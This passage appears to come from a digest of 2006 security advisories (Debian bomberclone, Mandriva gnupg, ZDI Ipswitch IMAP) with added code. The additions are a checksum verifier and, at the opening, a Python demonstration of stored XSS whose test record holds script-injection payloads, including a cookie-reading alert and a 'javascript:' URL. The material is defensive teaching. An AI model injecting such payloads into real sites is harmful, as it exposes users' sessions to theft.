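ADMIN_SESSION = {"zb_logged_no": 1, "zb_logged_time": 1000.0, "zb_logged_ip": "192.0.2.10"}
HOSTILE_MEMBER = {  # constructed member record whose fields carry markup
    "memo_title": "hello <script>alert(document.cookie)</script>",
    "email": "user@example.com\"><b>x</b>",
    "homepage": "javascript:alert(1)",
}


def admin_views_member(member: dict, escape: bool, request_ip: str, now: float):
    """Model the advisory's scenario: the administrator's browser requests the
    member page. Returns (session accepted?, markup survived into the page?)."""
    accepted = session_valid(ADMIN_SESSION, request_ip, now)
    if not accepted:
        return False, False
    page = render_member_row(member, escape)
    return True, ("<script" in page or "<b>" in page)


if __name__ == "__main__":
    # Administrator's own browser, unencoded output: check passes, script lands.
    print(admin_views_member(HOSTILE_MEMBER, escape=False, request_ip="192.0.2.10", now=1500.0))
    # Same request with encoding: check passes, markup is inert text.
    print(admin_views_member(HOSTILE_MEMBER, escape=True, request_ip="192.0.2.10", now=1500.0))
    # A copied cookie used from another host is what the IP check does stop.
    print(session_valid(ADMIN_SESSION, "198.51.100.7", 1500.0))
```

The two render modes differ only in encoding, which is the whole fix for the stored-XSS part of the advisory; the href handling is the one extra step, since an escaped javascript: URL is still a javascript: URL.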
[SECURITY] [DSA 997-1] New bomberclone packages fix arbitrary code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 997-1                        [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
March 13th, 2006                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : bomberclone
Vulnerability  : buffer overflows
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-0460
BugTraq ID     : 16697

Stefan Cornelius of Gentoo Security discovered that bomberclone, a free Bomberman-like game, crashes when receiving overly long error packets, which may also allow remote attackers to execute arbitrary code.

The old stable distribution (woody) does not contain bomberclone packages.

For the stable distribution (sarge) these problems have been fixed in version 0.11.5-1sarge1.

For the unstable distribution (sid) these problems have been fixed in version 0.11.6.2-1.

We recommend that you upgrade your bomberclone package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1.dsc
      Size/MD5 checksum:      668 e59985e92646e66e09f0c904cc777e82
    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1.diff.gz
      Size/MD5 checksum:     6985 a9d9696db932b11774b839d2b765fd31
    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5.orig.tar.gz
      Size/MD5 checksum:  7985803 cd2834d68980dd506038db44728cd2b1

  Architecture independent components:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone-data_0.11.5-1sarge1_all.deb
      Size/MD5 checksum:  7586908 c869506540ddfc25d3c452f32350d4ff

  Alpha architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_alpha.deb
      Size/MD5 checksum:   128338 d97db6f509a94124fab9e20cdcabb2a4

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_amd64.deb
      Size/MD5 checksum:   114644 827f5f7850204fd2166a34258f17a71d

  ARM architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_arm.deb
      Size/MD5 checksum:   117114 3e0cf308c1cb3a93a032eddfb7331f9c

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_i386.deb
      Size/MD5 checksum:    95614 626662760c83f79e2119e7e896970d4f

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_ia64.deb
      Size/MD5 checksum:   171882 ed2ef72266943a1cc789f3b6f0ba7358

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_hppa.deb
      Size/MD5 checksum:   107690 383b107de7545ced60bb5afa38b4ed92

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_m68k.deb
      Size/MD5 checksum:    94488 32dc2741532866a837e1a6c8d7909b06

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_mips.deb
      Size/MD5 checksum:   116202 e8c5cb65dfcfd70ffe8b6320188a6728

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_mipsel.deb
      Size/MD5 checksum:   116026 29263ffcbf426c911e0b3d8a034a9b92

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_powerpc.deb
      Size/MD5 checksum:   101888 0813f5ce3091cb8b7d482221c6b0a98f

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_s390.deb
      Size/MD5 checksum:   113050 b5298b8a579f76f1fd0751a64f2835d3

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_sparc.deb
      Size/MD5 checksum:   102884 72313829a57423a10dd1d200775c9f0d


  These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp:
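The upgrade instructions above assume the administrator fetches a file with wget and checks it against the "Size/MD5 checksum" line before running dpkg -i. The following is an added example, not part of DSA 997-1 or of Debian's own tooling, of a parser for those URL/checksum pairs and the check to run on a downloaded file. ADVISORY_TEXT reuses two real lines from the list above; CONSTRUCTED_TEXT is a made-up entry with a placeholder URL whose digest is md5("abc"), so the checker can be exercised offline.

```python
"""Added example (not part of DSA 997-1 or of Debian's tooling): parse the
"URL / Size/MD5 checksum" pairs listed in Debian advisories of this era and
verify a downloaded file against them before it is installed."""
import hashlib
import re
from typing import Dict, NamedTuple


class Expected(NamedTuple):
    url: str
    size: int
    md5: str


# Two real lines from the DSA 997-1 package list (the .dsc and the i386 .deb).
ADVISORY_TEXT = """\
    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1.dsc
      Size/MD5 checksum:      668 e59985e92646e66e09f0c904cc777e82
    http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_i386.deb
      Size/MD5 checksum:    95614 626662760c83f79e2119e7e896970d4f
"""

# Constructed entry with a placeholder URL; the digest is md5(b"abc"), so the
# checker can be exercised without downloading anything.
CONSTRUCTED_TEXT = """\
    http://example.invalid/pool/updates/main/d/demo/demo_1.0_all.deb
      Size/MD5 checksum:        3 900150983cd24fb0d6963f7d28e17f72
"""

URL_RE = re.compile(r"^\s*(https?://\S+)\s*$")
SUM_RE = re.compile(r"^\s*Size/MD5 checksum:\s*(\d+)\s+([0-9a-fA-F]{32})\s*$")


def parse_advisory(text: str) -> Dict[str, Expected]:
    """Map each file name to its expected size and MD5. A checksum line binds
    to the URL line immediately above it; anything else is ignored."""
    expected: Dict[str, Expected] = {}
    pending_url = None
    for line in text.splitlines():
        m = URL_RE.match(line)
        if m:
            pending_url = m.group(1)
            continue
        m = SUM_RE.match(line)
        if m and pending_url:
            filename = pending_url.rsplit("/", 1)[-1]
            expected[filename] = Expected(pending_url, int(m.group(1)), m.group(2).lower())
            pending_url = None
    return expected


def verify_download(filename: str, data: bytes, expected: Dict[str, Expected]) -> str:
    """Return "ok" when size and MD5 both match the advisory, otherwise a short
    reason. Size is compared first: a truncated or padded download fails
    before the digest is even computed."""
    exp = expected.get(filename)
    if exp is None:
        return "not listed in advisory"
    if len(data) != exp.size:
        return f"size mismatch: got {len(data)}, expected {exp.size}"
    digest = hashlib.md5(data).hexdigest()
    if digest != exp.md5:
        return f"md5 mismatch: got {digest}, expected {exp.md5}"
    return "ok"


def check_files(files: Dict[str, bytes], expected: Dict[str, Expected]) -> Dict[str, str]:
    """Verify several downloaded files at once; returns {filename: verdict}."""
    return {name: verify_download(name, data, expected) for name, data in files.items()}


if __name__ == "__main__":
    listed = parse_advisory(ADVISORY_TEXT)
    for name, exp in listed.items():
        print(f"{name}: {exp.size} bytes, md5 {exp.md5}")
    demo = parse_advisory(CONSTRUCTED_TEXT)
    print(check_files({"demo_1.0_all.deb": b"abc", "demo_1.0_all.deb.bak": b"abc"}, demo))
```

This is an integrity check against a corrupted or truncated mirror, not authentication: MD5 no longer resists collisions, and the value being compared comes from the advisory text. The PGP signature wrapped around the advisory is what vouches for that list, so verify the signature first and the checksums second.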
[ MDKSA-2006:055 ] - Updated gnupg packages fix signature file verification vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:055
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gnupg
 Date    : March 13, 2006
 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Another vulnerability, different from that fixed in MDKSA-2006:043 (CVE-2006-0455), was discovered in gnupg in the handling of signature files. This vulnerability is corrected in gnupg 1.4.2.2 which is being provided with this update.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0049
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 10.2:
 78bc5edadc4c09cc79301e92e769792b  10.2/RPMS/gnupg-1.4.2.2-0.1.102mdk.i586.rpm
 a64138f15d9d24c9fd342a9d58739629  10.2/SRPMS/gnupg-1.4.2.2-0.1.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 921557b980e6831d91f67c1be03ff221  x86_64/10.2/RPMS/gnupg-1.4.2.2-0.1.102mdk.x86_64.rpm
 a64138f15d9d24c9fd342a9d58739629  x86_64/10.2/SRPMS/gnupg-1.4.2.2-0.1.102mdk.src.rpm

 Mandriva Linux 2006.0:
 ff09cfa3b8f71b9e5ddf4a7639696b9d  2006.0/RPMS/gnupg-1.4.2.2-0.1.20060mdk.i586.rpm
 22b6b9305f47570652dc276cf8f18401  2006.0/SRPMS/gnupg-1.4.2.2-0.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 388c4bca33be3cccb9a44e87b1a34964  x86_64/2006.0/RPMS/gnupg-1.4.2.2-0.1.20060mdk.x86_64.rpm
 22b6b9305f47570652dc276cf8f18401  x86_64/2006.0/SRPMS/gnupg-1.4.2.2-0.1.20060mdk.src.rpm

 Corporate 3.0:
 cd7fbec4de29eabcc31fdeb90e05f674  corporate/3.0/RPMS/gnupg-1.4.2.2-0.1.C30mdk.i586.rpm
 54fa6da091d1124b661a9fbc4f21abe1  corporate/3.0/SRPMS/gnupg-1.4.2.2-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 f43a3a505f7874324542f16398243786  x86_64/corporate/3.0/RPMS/gnupg-1.4.2.2-0.1.C30mdk.x86_64.rpm
 54fa6da091d1124b661a9fbc4f21abe1  x86_64/corporate/3.0/SRPMS/gnupg-1.4.2.2-0.1.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 3a998c3c9451bba3ac118df3a8b74955  mnf/2.0/RPMS/gnupg-1.4.2.2-0.1.M20mdk.i586.rpm
 18cfe29d05e64e08c77bab8683517798  mnf/2.0/SRPMS/gnupg-1.4.2.2-0.1.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
                                security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFEFcoumqjQ0CJFipgRAo0CAKCTHjbpAjG4GONKzPzHGja45wyVAgCgyApo
91TxmG2szENod45PnFctWyg=
=5TQS
-----END PGP SIGNATURE-----
ZDI-06-003: Ipswitch Collaboration Suite Code Execution Vulnerability
ZDI-06-003: Ipswitch Collaboration Suite Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-003.html
March 13, 2006

-- CVE ID:
CVE-2005-3526

-- Affected Vendor:
Ipswitch

-- Affected Products:
Ipswitch Collaboration Suite 2006.02 and below

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since December 13, 2005 by Digital Vaccine protection filter ID 3982. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Ipswitch Collaboration Suite. Authentication is required to exploit this vulnerability.

This specific flaw exists within the IMAP daemon. A lack of bounds checking during the parsing of long arguments to the FETCH verb can result in an exploitable buffer overflow.

-- Vendor Response:
From http://www.ipswitch.com/support/ics/updates/ics200603prem.asp:

    IMAP: Corrected a vulnerability issue where a properly crafted Fetch command causes IMAP to crash with a buffer overflow (disclosed by TippingPoint, a division of 3Com).

-- Disclosure Timeline:
2005.12.13 - Vulnerability reported to vendor
2005.12.13 - Digital Vaccine released to TippingPoint customers
2006.03.13 - Public release of advisory

-- Credit:
This vulnerability was discovered by Manuel Santamarina Suarez aka 'FistFuXXer'.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.